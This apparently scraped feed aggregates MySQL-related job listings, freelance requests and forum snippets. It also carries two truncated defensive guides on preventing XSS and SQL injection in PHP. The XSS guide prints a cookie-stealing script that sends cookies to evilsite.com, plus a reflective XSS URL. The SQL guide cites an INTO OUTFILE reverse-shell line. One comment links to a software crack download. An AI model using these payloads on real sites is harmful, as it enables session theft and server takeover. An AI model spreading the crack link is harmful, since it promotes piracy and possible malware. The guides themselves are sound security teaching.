VR、AR、Web開発のエンジニアを募集します! 業務はWebシステム開発の他、VRやARアプリの開発など、多岐に渡ります。 また仕事の内容により、インタラクティブコンテンツ開発などを手がけていくことも。 アイデアクラウドでは、Unityでの開発から、単純なWebコーディング・Javascriptなどのフロントエンドの追求・PHPやDBを利用したバックエンド構築・インフラ構築・サーバーメンテナンスなど、あらゆる業務がございます。 何でも対応するような状況ではありますが、全てをおまかせする訳では無く、適性と、本人の希望を考慮し、割り当てる作業、責任領域は、適切に振り分けを行います。 営業・企画・デザインについてはディレクター・デザイナーが行うため、プログラムのスキルを最大限伸ばすことができます。 また、実力次第で、先端技術開発や自社プロダクトの開発、将来的にはプログラマー職から、プロジェクトマネージャーなどの上級職への転身や、経営に関わる会社の中心的なポジションに着くことも可能です。 【募集職種】 プログラマー 【 こんなあなたを、WANTED! 】 ✔プログラムに興味のある方 ✔プログラミングが好きな方 ✔将来、ディレクターとして活躍していきたい方 【対象】 ・実務経験者(コーディング・Web構築・システム開発・アプリ開発など) ※一部でも実務に携わっていればOK。全てできる必要はありません。 【主な業務内容】 ・HTMLコーディング(レスポンシブ) ・CMS構築(BtoBシステムなど) ・Wordpress組み込み&カスタマイズ ・DBの構築(MySQL/PostgreSQL) ・VR、ARアプリ開発 ・インタラクティブコンテンツ開発 【使用言語、開発環境など】 ■仕様言語 ・HTML5 ・CSS3 ・PHP ・Javascript ・C# ・Swift ・Java など ※全ての言語を習得する必要はありあせん。 ■開発環境、使用ツールなど ・Sublime Text ・Illustrator ・Unity ・Xcode ・Android Studio など担当領域に併せて利用
          (USA-VA-Chantilly) Software Application Engineer      Cache   Translate Page      
Job Description What You’ll Get to Do: CACI is currently looking for outstanding IT candidates to join our TSA IT Management, Performance Analysis, and Collaborative Technologies (IMPACT) team in the National Capital Region (NCR) and throughout the United States. CACI will provide a variety of IT services through IMPACT including cyber security, identity and access management, risk management, cloud integration and engineering, field support services, service desk, application deployment and optimization, and operations center support services. CACI will support TSA in both classified and unclassified IT operational environments increasing availability and security for a variety of applications and systems. IMPACT services will integrate with the broader DHS mission and enhance existing Department-wide IT capabilities. More About the Role: + Sustainment of application systems and infrastructure and systems deployed to TSA’s production network + Support for applications transitioning into TSA’s Test environment + Daily, weekly, monthly preventative maintenance + Tier 3/4 break-fix support + Emergency release/update support + Interacting with network, security, database or other support teams as required to resolve break/fix issues + Capacity/utilization trend analysis + Coordinating backup / restoration of application systems and data + Updating Standard Operating Procedures as required + Updating break/fix / knowledge database as required + Configuration management and control of production application, systems, infrastructure and services + Researching and recommending future technologies for consideration and adoption + Identifying opportunities to improve application sustainability, security, and/or cost efficiency You’ll Bring These Qualifications: + Ability to obtain a DOD Security Clearance + Ability to obtain a DHS Entrance on Duty (EOD) + BA/BS or equivalent experience and minimum 5 years related work experience + Relevant DHS focused experience + Strong candidates will have a good understanding of standard software development lifecycles, including Agile and Waterfall, for one or more U.S. Federal Agencies or DoD. + Be well-versed in application development using .NET, Java, PHP, Microsoft SQL, MySQL or Oracle and Oracle Middleware + Experience working with design engineers or product development team test technical products and report problems or failures to improve or perfect the products + Experience developing and executing test plans, procedures, test cases, and test scripts for IT SOA development environment projects + Experience supervising test and evaluation technical effort + Experience performing typical tasks that include, but are not limited to, prototype development and first article testing, environmental testing, independent verification and validation, demonstration and validation, simulation and modeling, system safety, quality assurance, education and training, and physical testing of the product or system + Experience performing system, interface, deployment, and performance testing on a variety of systems, platforms, and environments + A background in providing customer support, operational support, and analysis of test results + Experience coordinating across multiple stakeholders of various technical backgrounds + Excellent oral and written communications + Experience using quality control and application testing tools + Experience in utilizing the COTS products identified such as the following: + Operating System: IBM AIX, Solaris OS, Red Hat Enterprise Linux, Microsoft Windows Server 2008 or later + Oracle: Oracle Application Server; Oracle Grid Infrastructure; Oracle Database; Oracle Clients; Oracle SQL Developer; WebLogic, + Data Loss Prevention: McAfee Agent; McAfee Host Intrusion Prevention; McAfee Policy Auditor; Policy Auditor Content Update; Policy Auditor Agent; SQL Server + COTS: Internet Explorer; Adobe Acrobat Reader X; ActivClient CAC; ActivCard Gold for CAC -“ PKI; ForgeRock Open AM Java EE Policy Agent; Tivoli Client, Veritas Volume Manager & Netbackup + Detail oriented + Flexible – The environment is highly dynamic. You will be expected to keep up with the changing environment while ensuring a high level of operational effectiveness + Team Player – This role is part of a much larger team What We Can Offer You: - We’ve been named a Best Place to Work by the Washington Post. - Our employees value the flexibility at CACI that allows them to balance quality work and their personal lives. - We offer competitive benefits and learning and development opportunities. - We are mission-oriented and ever vigilant in aligning our solutions with the nation’s highest priorities. - For over 55 years, the principles of CACI’s unique, character-based culture have been the driving force behind our success. TSAHP Job Location US-Chantilly-VA-VIRGINIA SUBURBAN CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          (USA-VA-Reston) Software Developer      Cache   Translate Page      
Job Description CACI is looking for an experienced Software Developer to join our team to perform full lifecycle software development activities on a myriad of business systems and tools. you will maintain and enhance a system built on Java and MySQL technologies hosted in the cloud environment. You will confer with management and other development team members to prioritize needs, resolve conflicts, develop content criteria, or choose solutions. You will have the following: + Web designs that effectively address interoperability with other applications. + Writing interfaces to companion applications or databases. + Writing necessary code, scripts, and macros. + Experience developing with the JAVA based MVC framework Spring/Bootstrap. + Experience developing client-side JavaScript user interfaces using JQuery/Bootstrap, HTML, and CSS. + Experience designing and developing with MySQL RDBMS including proficiency with SQL. + Experience with Amazon Web Services (AWS) You will have one of the following: + 8 Years of job related experience and Associate degree + 4-7 Years of job related experience and Bachelor’s degree + 3 Years of job related experience and Master’s degree + 2 Years of job related experience and Doctorate It would be nice if you had: + Experience with tools such as Maximo and Sponsor’s help desk suite. + Experience programming with related technologies such as Java, C, C++, Perl. + Experience in web protocols and technologies – XML, HTML, HTTP, and System Design. + Experience with application development or software engineering experience in developing web-based applications. + Experience with MS Report Builder, MySQL, and database management software. + Server and database administration for virtual appliances, Linux and windows 10 desktop + Build virtual servers & provide technical configuration, setup, installation services, hardware and coordination of application projects. + General knowledge of VMware Work hours: Eight hour workday, core hours are 9:30am to 2:30pm; may be extended hours requirements Work location: Herndon, VA Job Location US-Reston-VA-VIRGINIA SUBURBAN CACI employs a diverse range of talent to create an environment that fuels innovation and fosters continuous improvement and success. At CACI, you will have the opportunity to make an immediate impact by providing information solutions and services in support of national security missions and government transformation for Intelligence, Defense, and Federal Civilian customers. CACI is proud to provide dynamic careers for employees worldwide. CACI is an Equal Opportunity Employer - Females/Minorities/Protected Veterans/Individuals with Disabilities.
          Full-Stack Developer - Angular2, PHP, MySQL - (Salary DOE)      Cache   Translate Page      
TX-Dallas, Job title: Full-Stack Software Developer Job Location: Dallas, TX Required Skills: Angular2, PHP, and MySQL Salary: Depending on experience (DOE) Located in beautiful Dallas, TX, we are one of the leading cloud based digital business management firm in TX. Due to growth and ongoing and future projects, we are looking to hire for a talented Full-Stack Software Developer to join our team. This perso
          Help or image manipulation class php&quest;      Cache   Translate Page      

im really having a tough time trying to upload images using php and mysql, and i really need help!

this is what i want to do in natural language:

1. upload an image 2. check if format is okay(png, jpeg, gif) 3. rename the image file, so theres no ambugity in this format(eg. pic-$userid.gif) 4. upload the pic to the images/folder 5. and delete the old one, or remove the defualt picture when on registration

im trying to look for resources online, but cnt seem to find any!!1 thanks :))

If you have the patience, I think that looking into these guys code is the best way to go: http://www.verot.net/php_class_upload.htm

Or, why not, just use their class. It will save you from a lot of headache and help you reach your goal faster.

Cheers!


          Websocket function like UBER      Cache   Translate Page      
99% app complete. we need to develop only the websocket function like UBER for smooth icon movement and integrate few APIs to frontend and very minor modification of UI. Budget around (Budget: $30 - $250 SGD, Jobs: Android, Java, Javascript, MySQL, node.js)
          UI Developer in Egypt      Cache   Translate Page      
UI Developer Position: UI Developer Location: remote work / home Experience: 3 Years Desired Candidate Profile: B.Tech / B.E. / MCA Responsibilities • Responsible for meeting expectations and deliverables on time and in high quality. • Responsible for the development of web applications and components. • Responsible for the design and development of web pages, graphics, multimedia, GUIs. • Demonstrates creative, technical and analytical skills. • Demonstrates ability to communicate effectively in both technical and business environments. Requirements • Well-versed with languages like HTML, CSS, Javascript, Bootstrap. • Front-end skills and basic understanding of how back-end development works. • Solid understanding of UX and UI design with an emphasis on maximizing usability • Key Skills :PHP, Javascript, JQuery, MySQL, HTML, Bootstrap, CSS, Ajax • Effective time management and coordination skills • English / Arabic language • Typing speed 30+ WPM • Remote employees are required to work in a quiet room with a door, and are not permitted to be a primary caregiver for a child or infirmed person, or doing side work, during the work hours.
          Java Lead Developer / Team Leader - AWS      Cache   Translate Page      
Java Lead Developer with hands-on Java Development and experience of leading a team in the UK and abroad to join an organisation at the forefront of Mobile web and mobile billing. The organisation has a diverse range of products across SAAS, e-commerce and B2B products. The organisation has just moved to modern new offices in South London with great views from the roof terrace. The Java Team Lead will have some of the following skills; Hands-on Java, AWS, Web Services, Spring, Hibernate, MongoDB, MS SQL, MySQL, Cloud data migration etc. Familiarity with DevOps concepts Experience with AWS cloud architecture in an enterprise environment Knowledge of cloud data stores - S3, Dynamo DB and / or Amazon RDS Strong experience of Amazon Web Services, e.g. VPC, Direct Connect, RDS, Lamda etc Experience with infrastructure and Cloud Migration. This is a long term contract with an initial period of 6 Months. Please forward your CV urgently.
          Comment on Configuring a Local Apache/PHP/MySQL Dev Environment in OS X by Muhammad Talha      Cache   Translate Page      
I have found way to host multiple website locally on your mac. Download the Updated version of VirtualHostX https://crackmines.com/virtualhostx-crack-with-serial-key-windows-mac/
          Cronjob demo test      Cache   Translate Page      

Won’t post the script here for security reasons.

Hint:

cp backup demo
mysql demo_db < demo-backup.sql

          Errore Installazione v2.0.0-alpha.1      Cache   Translate Page      

Prova a vedere se hai php 7 e se hai digitato /index.php/setup
il DB può essere solo mySQL


          Unity: MySQL Database Management (Видеокурс)      Cache   Translate Page      
#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000\Название: Unity: MySQL Database Management (Видеокурс)
Автор: Armin Sarajlic
Издательство: Udemy
Год: 2018
Видео: H264 MP4 AVC, 1280x720
Аудио: AAC 48000 KHz 2 Ch
Продолжительность: 01:18:00
Размер: 496 mb
Язык: English

Create a Login & Registration system for your game in 1 hour!
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Need a Gym Management System      Cache   Translate Page      
I Need a Gym Management System, that has Barcode Check in and Check out implemented in it. and that can Management emailing and Gym internal. (Budget: $30 - $250 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          to modify Openbravo Java-based ERP      Cache   Translate Page      
I am looking for a Java programmer to modify Openbravo Java-based open source ERP ! Some for mobile App, or printing report, or SQL database program! (Budget: $30 - $250 USD, Jobs: Database Programming, Java, MySQL, Software Architecture)
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Head of Web developer / Development Manager - AL REEM INT CONSTRUCTION - Abu Dhabi      Cache   Translate Page      
*Design, develop, and debug PHP based applications(In MVC, core PHP, CakePHP), with MySQL database as backend.* *Enhance user experience of existing systems...
From Indeed - Tue, 25 Sep 2018 04:27:43 GMT - View all Abu Dhabi jobs
          fixe control form on WP      Cache   Translate Page      
We have a problem with datas phone on form7 plugin. Data sending correctly by email but validation for payment doesn't work ( format phone don't accept blank caracters) 1) User fill form = ok 2) WP redirect... (Budget: €8 - €30 EUR, Jobs: HTML, Javascript, MySQL, PHP, WordPress)
          fixe control form on WP      Cache   Translate Page      
We have a problem with datas phone on form7 plugin. Data sending correctly by email but validation for payment doesn't work ( format phone don't accept blank caracters) 1) User fill form = ok 2) WP redirect... (Budget: €8 - €30 EUR, Jobs: HTML, Javascript, MySQL, PHP, WordPress)
          RDS MySQL DB - how to disable have_ssl and have_openssl      Cache   Translate Page      
I have provisioned MySQL DB 5.6.40 and it has two system variables "have_ssl" and "have_openssl" enabled.
...
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Head of Web developer / Development Manager - AL REEM INT CONSTRUCTION - Abu Dhabi      Cache   Translate Page      
*Design, develop, and debug PHP based applications(In MVC, core PHP, CakePHP), with MySQL database as backend.* *Enhance user experience of existing systems...
From Indeed - Tue, 25 Sep 2018 04:27:43 GMT - View all Abu Dhabi jobs
          Everything You Need to Know About Preventing Cross-Site Scripting Vulnerabilitie ...      Cache   Translate Page      

Cross-Site Scripting(abbreviated as XSS) is a class of security vulnerability whereby an attacker manages to use a website to deliver a potentially malicious javascript payload to an end user.

XSS vulnerabilities are very common in web applications. They're a special case of code injection attack; except where SQL injection, local/remote file inclusion, and OS command injection target the server, XSS exclusively targets the users of a website.

There are two main varieties of XSS vulnerabilities we need to consider when planning our defenses:

Stored XSS occurs when data you submit to a website is persisted (on disk or in RAM) across requests, usually with the goal of executing when a privileged user access a particular web page. Reflective XSS occurs when a particular page can be used to execute arbitrary code, but it does not persist the attack code across multiple requests. Since an attacker needs to send a user to a specially crafted URL for the code to run, reflective XSS usually requires some social engineering to pull off.

Cross-Site Scripting vulnerabilities can be used by an attacker to accomplish a long list of potential nefarious goals, including:

Steal yoursession identifier so they can impersonate you and access the web application. Redirect you to a phishing page that gathers sensitive information. Install malware on your computer (usually requires a 0day vulnerability for your browser and OS). Perform tasks on your behalf (i.e. create a new administrator account with the attacker's credentials).

Cross-Site Scripting represents an asymmetric in the security landscape. They're incredibly easy for attackers to exploit, but XSS mitigation can become a rabbit hole of complexity depending on your project's requirements.

Brief XSS Mitigation Guide If your framework has a templating engine that offers automatic contextual filtering, use that. Make sure you use the appropriate context flags (e.g. url , html_attr , html ). Context matters to XSS prevention. echo htmlentities($string, ENT_QUOTES | ENT_html5, 'UTF-8'); is a safe and effective way to stop all XSS attacks on a UTF-8 encoded web page, but doesn't allow any HTML. If your requirements allow you to use e.g. Markdown instead of HTML, then. If you need to allow some HTML and aren't using a templating engine (see #1), use HTML Purifier . For user-provided URLs, you additionally want to only allow http: and https: schemes; never javascript: . Furthermore, URL encode any user input.

The rest of this document explains cross-site scripting vulnerabilities and their mitigation strategies in detail.

What Does a XSS Vulnerability Look Like?

XSS vulnerabilities can occur in any place where information which can be altered by any user is included in the output of a webpage without being properly escaped.

Example 1 <div id="profile"><?php echo $user['profile']; ?></div>

This is a potential stored XSS infection point (assuming the profile field was pulled straight from the database without escaping). If the malicious user is able to include a snippet that looks like this, they can exploit any authenticated user that visits their profile and steal their cookies for future impersonation efforts:

<script> window.open("http://evilsite.com/cookie_stealer.php?cookie=" + document.cookie, "_blank"); </script> Example 2 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

The above snippet is vulnerable to reflective XSS attacks. Just trick a user into visiting /form.php?%22%20onload%3D%22alert(%27XSS%27)%3B and they will see an alert box pop up containing the message 'XSS' when your page loads.

<form action="/form.php?" onload="alert('XSS');" method="post">

UnlikeSQL Injection, which prepared statements defeat 100% of the time, cross-site scripting doesn't have an industry standard strategy for separating data from instructions. You have to escape special characters to prevent attacks.

The Quick and Dirty XSS Mitigation Technique for PHP Applications

The simplest and most effective way to prevent XSS attacks is the nuclear option: Ruthlessly escape any character that can affect the structure of your document.

For best results, you want to use the built-in htmlentities() function that PHP offers instead of playing with string escaping yourself.

<?php /** * Escape all HTML, JavaScript, and CSS * * @param string $input The input string * @param string $encoding Which character encoding are we using? * @return string */ function noHTML($input, $encoding = 'UTF-8') { return htmlentities($input, ENT_QUOTES | ENT_HTML5, $encoding); } echo '<h2 title="', noHTML($title), '">', $articleTitle, '</h2>', "\n"; echo noHTML($some_data), "\n";

The security of this construction depends on the presence of the ENT_QUOTES flag when to escape HTML attribute values. It's important to note that this prevents any HTML characters in $some_data from displaying on the web page.

Why ENT_QUOTES | ENT_HTML5 and 'UTF-8' ?

We specify ENT_QUOTES to tell htmlentities() to escape quote characters ( " and ' ). This is helpful for situations such as:

<input type="text" name="field" value="<?php echo $escaped_value; ?>" />

If you failed to specify ENT_QUOTES and attacker simply needs to pass " onload="malicious javascript code as a value to that form field and presto, instant client-side code execution.

We specify ENT_HTML5 and 'UTF-8' so htmlentities() knows what character set and version of the HTML standard to work with.

The reason we need to specify both values is, as demonstrated against mysql_real_escape_string() , an incorrect (especially attacker-controlled) character encoding can defeat string-based escaping strategies.

For the sake of safety and consistency, the encoding we specify here, the encoding sent in the charset attribute of the <meta> tag, and the charset added to the Content-Type HTTP header should all match.

Important - Avoid Premature Optimization Always escape data on output (when displaying to a user).

Do not escape user input against XSS attacks before inserting into a database. WordPress made this mistake and eventually security researcher Jouko Pynnnen of Klikki Oy realized MySQL column truncation can defeat before-insert XSS prevention strategies .

You should still be validating your input , however. If you're expecting an email address, make sure it's formatted like one.

$email = filter_var($_POST['email'], FILT
          Preventing SQL Injection in PHP Applications - the Easy and Definitive Guide      Cache   Translate Page      

SQL Injectionis a technique for taking control of a database query and often results in a compromise of confidentiality. In some cases (e.g. if SELECT 'evil code here' INTO OUTFILE '/var/www/reverse_shell.php' succeeds) this can result in a complete server takeover.

Since code injection (which encompasses SQL, LDAP, OS Command, and XPath Injection techniques) has consistently remained on top of the OWASP Top Ten vulnerabilities, it's a popular topic for bloggers trying to get their feet wet in the application security field.

While more people sharing knowledge about application security is a good thing, unfortunately much of the advice circulating on the Internet (especially on ancient blog posts that rank high on search engines) is outdated, unintentionally misleading, and often dangerous.

How to Prevent SQL Injection (Almost) Every Time, Guaranteed*

Use Prepared Statements, also known as parametrized queries . For example:

/** * Note: This code is provided for demonstration purposes. * In general, you want to add some application logic to validate * the incoming parameters. You do not need to escape anything. */ $stmt = $pdo->prepare('SELECT * FROM blog_posts WHERE YEAR(created) = ? AND MONTH(created) = ?'); if ($stmt->execute([$_GET['year'], $_GET['month']])) { $posts = $stmt->fetchAll(\PDO::FETCH_ASSOC); }

Prepared Statements eliminate any possibility of SQL Injection in your web application. No matter what is passed into the $_GET variables here, the structure of the SQL query cannot be changed by an attacker (unless, of course, you have PDO::ATTR_EMULATE_PREPARES enabled, which means you're not truly using prepared statements).

Note:If you attempt to turn PDO::ATTR_EMULATE_PREPARES off, some versions of some database drivers might ignore you. To be extra cautious, explicitly set the character set in the DSN to one your application and database both use (e.g. UTF-8 , which if you're using mysql, is confusingly called utf8mb4 ).

Prepared Statements solve a fundamental problem of application security: They separate the data that is to be processed from the instructions that operate on said data by sending them in completely separate packets. This is the same fundamental problem that makes stack/heap overflows possible.

As long as you never concatenate user-provided or environment variables with the SQL statement(and make sure you aren't using emulated prepares) you can for all practical purposes cross SQL injection off your checklist forever.

Important Caveat and Clarification*

Prepared statements secure the interactions between your web application and your database server (if they're on separate machines, they should also be communicating over TLS). It's still possible that an attacker could store a payload in a field that could be dangerous in, for example, a stored procedure. We call this a higher-order SQL injection (the linked Stack Overflow answer refers to them as "second-order", but anything after the initial query is executed should be a target for analysis).

In this situation, our advice would be not to write stored procedures such that they create higher-order SQL injection points.

What About Sanitizing Input?
Preventing SQL Injection in PHP Applications - the Easy and Definitive Guide

Many people have seen this 2007 comic from XKCD about SQL Injection exploits. It's frequently cited or included in security conference talks, especially ones addressed to newcomers. The comic has done a lot of good raising awareness of the dangerous of user input in database queries, but its advice to sanitize your database inputs is, by a 2015 understanding of the issues involved, only a half-measure.

You're Likely Better Off Forgetting About Sanitizing Input (in Most Cases)

While it's possible to prevent attacks by rewriting the incoming data stream before you send it to your database driver, it's rife with dangerous nuance and obscure edge-cases . (Both links in the previous sentence are highly recommended.)

Unless you want to take the time to research and attain complete mastery over every Unicode format your application uses or accepts, you're better off not even trying to sanitize your inputs. Prepared statements are more effective at preventing SQL injection than escaping strings.

Furthermore, altering your incoming data stream can cause data corruption, especially if you are dealing with raw binary blobs (e.g. images or encrypted messages).

Prepared statements are easier and can guarantee SQL Injection prevention.

If user input never has the opportunity to alter the query string, it can never lead to code execution. Prepared statements completely separate code from data.

XKCD's author Randall Munroe is a smart cookie. If this comic were being written today, the hacker mom character probably would have said this instead:


Preventing SQL Injection in PHP Applications - the Easy and Definitive Guide
Input Should Still Be Validated

Validation is not the same thing as sanitation. Prepared statements can prevent SQL Injection, but they cannot save you from bad data. For most cases, filter_var() is useful here.

$email = filter_var($_POST['email'], FILTER_VALIDATE_EMAIL); if (empty($email)) { throw new \InvalidArgumentException('Invalid email address'); }

Note: filter_var() validates that the given email address string conforms to the RFC specification. It does not guarantee that there is an open inbox at that address, nor does it check that the domain name is registered. A valid email address is still not safe to use in raw queries, nor to display on a web page without filtering to prevent XSS attacks .

What About Column and Table Identifiers?

Since column and table identifiers are part of the query structure, you cannot parametrize them. Consequently, if the application you are developing requires a dynamic query structure where tables or columns are selected by the user, you should opt for a whitelist.

A whitelist is an application logic strategy that explicitly only allows a few accepted values and either rejects the rest or uses a sane default. Contrast it with a blacklist, which only forbids known-bad inputs. In most cases, whitelists are better for security than blacklists.

$qs = 'SELECT * FROM photos WHERE album = ?'; // Use switch-case for an explicit whitelist switch ($_POST['orderby']) { case 'name': case 'exifdate': case 'uploaded': // These strings are trusted and expected $qs .= ' ORDER BY ' . $_POST['orderby']; if (!empty($_POST['asc'])) { $qs .= ' ASC'; } else { $qs .= ' DESC'; } break; default: // Some other value was passed. Let's just order by photo ID in descending order. $qs .= ' ORDER BY photoid DESC'; } $stmt = $db->prepare($qs); if ($stmt->execute([$_POST['album_id']])) { $photos = $stmt->fetchAll(\PDO::FETCH_ASSOC); }

If you're allowing the end user to provide the table and/or column names, because identifiers cannot be parameterized, you still must resort to escaping. In these situations, we recommend the following:

Don't : Just escape SQL meta characters (e.g. ' ) Do : Filter out every character that isn't allowed.

The following code snippet will only allow table names that begin with an uppercase or lowercase letter, followed by any number of alphanumeric characters and underscores.

if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $table)) { throw new AppSpecificSecurityException("Possible SQL injection attempt."); } // And now you can safely use it in a query: $stmt = $pdo->prepare("SELECT * FROM {$table}"); if ($stmt->execute()) { $results = $stmt->fetchAll(PDO::FETCH_ASSOC); } What if Using Prepared Statements Seems Too Cumbersome?

The first time a developer encounters prepared statements, they can feel frustrated about the prospect of being forced to write a lot of redundant code (prepare, execute, fetch; prepare, execute, fetch; ad nauseam ).

Thus, the team at Paragon Initiative Enterprises wrote a PHP library called EasyDB .

How to Use EasyDB

There are two ways to start using EasyDB in your code:

You can use EasyDB to wrap your existing PDO instances. If you're familiar with PDO constructors, you can pass the same arguments to \ParagonIE\EasyDB\Factory::create() instead. // First method: $pdo = new \PDO( 'mysql;host=localhost;dbname=something', getenv('MYSQL_USERNAME'), getenv('MYSQL_PASSWORD') ); $db = \ParagonIE\EasyDB\EasyDB($pdo); // Second method: $db = \ParagonIE\EasyDB\Factory::create( 'mysql;host=localhost;dbname=something', getenv('MYSQL_USERNAME'), getenv('MYSQL_PASSWORD') );

(The use of getenv() is best supplemented with a library such as phpdotenv .)

Once you have an EasyDB object, you can begin leveraging its simplified interface to quickly develop secure database-aware applications. Some examples include:

Safe Database Querying with Prepared Statements /** * As mentioned previously, you should perform validation on all input. * Not necessarily for security reasons, but because well-designed software * validates all user-supplied input and informs them how to correct it. * * For the sake of easy auditing, you probably don't want to pass $_GET, * $_POST, other superglobals. Instead, validate and store the results * in a local variable. */ $data = $db->safeQuery( 'SELECT * FROM transactions WHERE type = ? AND amount >= ? AND date >= ?', [ $_POST['ttype'], $_POST['minimum'], $_POST['since'] ] ); Select many rows from a database table /** * Although safe from SQL injection, this example snippet does not * validate its input. In real applications, please check that any data * your script is given is valid. */ $rows = $db->run( 'SELECT * FROM comments WHERE blogpostid = ? ORDER BY created ASC', $_GET['blogpostid'] ); foreach ($rows as $row) { $template_engine->render('comment', $row); } Select one row from a database table /** * Although safe from SQL injection, this example snippet does not * validate its input. In real applications, please check that any data * your script is given is valid. */ $userData = $db->row( "SELECT * FROM users WHERE userid = ?", $_GET['userid'] ); Insert a new row into a database table /** * Although safe from SQL injection, this example snippet does not * validate its input. In real applications, please check that any data * your script is given is valid. */ $db->insert('comments', [ 'blogpostid' => $_POST['blogpost'], 'userid' => $_SESSION['user'], 'comment' => $_POST['body'], 'parent' => isset($_POST['replyTo']) ? $_POST['replyTo'] : null ]); NEW: Dynamic Queries with EasyStatement

If you're using EasyDB 1.2.0 or 2.2.0 (or newer), you can use the new EasyStatement API (provided by Woody Gilk ) to generate dynamic queries.

$statement = EasyStatement::open() ->with('last_login IS NOT NULL'); if (strpos($_POST['search'], '@') !== false) { // Perform a username search $statement->orWith('username LIKE ?', '%' . $db->escapeLikeValue($_POST['search']) . '%'); } else { // Perform an email search $statement->orWith('email = ?', $_POST['search']); } // The statement can compile itself to a string with placeholders: echo $statement; /* last_login IS NOT NULL OR username LIKE ? */ // All the values passed to the statement are captured and can be used for querying: $user = $db->single("SELECT * FROM users WHERE $statement", $statement->values());

The EasyStatement API supports variable arguments ( x IN (1, 2, 3) ):

// Statements also handle translation for IN conditions with variable arguments, // using a special ?* placeholder: $roles = [1]; if ($_GET['with_managers']) { $roles[] = 2; } $statement = EasyStatement::open()->in('role IN (?*)', $roles); // The ?* placeholder is replaced by the correct number of ? placeholders: echo $statement; /* role IN (?, ?) */ // And the values will be unpacked accordingly: print_r($statement->values()); /* [1, 2] */

Finally, with EasyStatement , you can also group conditions together:

// Statements can also be grouped when necessary: $statement = EasyStatement::open() ->group() ->with('subtotal > ?') ->andWith('taxes > ?') ->end() ->orGroup() ->with('cost > ?') ->andWith('cancelled = 1') ->end(); echo $statement; /* (subtotal > ? AND taxes > ?) OR (cost > ? AND cancelled = 1) */

Despite the dynamic nature of the above queries, prepared statements are being used consistently.

Escape an Identifier (Column/Table/View Names) for Dynamic Queries

The new EasyStatement API should be preferred over doing this manually.

$whiteListOfColumnNames = ['username', 'email', 'last_name', 'first_name']; $qs = 'SELECT * FROM some_table'; $and = false; if (!empty($where)) { $qs .= ' WHERE '; foreach (\array_keys($where) as $column) { if (!\in_array($column, $whiteListOfColumnNames)) { continue; } if ($and) { $qs .= ' AND '; } $qs .= $db->escapeIdentifier($column).' = ?'; $and = true; } } $qs .= ' ORDER BY rowid DESC'; // And then to fetch some data $data = $db->run($qs, \array_values($where));

Caution: The escapeIdentifier() method is meant for this very specific use-case of escaping field and table names and should not be used for escaping user input.

Can I Use EasyDB to Satisfy Business Needs?

Yes.We have chosen to release EasyDB under a very permissive license (MIT) because we wish to promote the adoption of better security practices in the community at large. Feel free to use EasyDB in any of your projects, even commercial ones. You don't owe us anything.

Should I use EasyDB over an ORM or Component of My Framework?

If you're already using tools that you're comfortable with that provide secure defaults (e.g. most modern PHP frameworks), don't drop them in favor of EasyDB. Easy doesn't mean "fits all use cases".

If you're using a CMS that doesn't follow secure best practices , you should solve the problem upstream by getting the CMS to adopt non-emulated prepared statements.

PHP- and PDO-Specific Recommendations

If you are a PHP developer looking to get the most out of PDO, and you don't want to add EasyDB to your project, we recommend changing two of the default settings:

Turn off emulated prepares. This ensures you get actual prepared statements . Set error mode to throw exceptions. This saves you from having to check the result of PDOStatement::execute() and makes your code less redundant. $pdo = new PDO(/* Fill in the blank */); $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

Because PDO::ATTR_EMULATE_PREPARES is set to false , we're getting real prepared statements, and because we've set PDO::ATTR_ERRMORE to PDO::ERRMODE_EXCEPTION , instead of this...

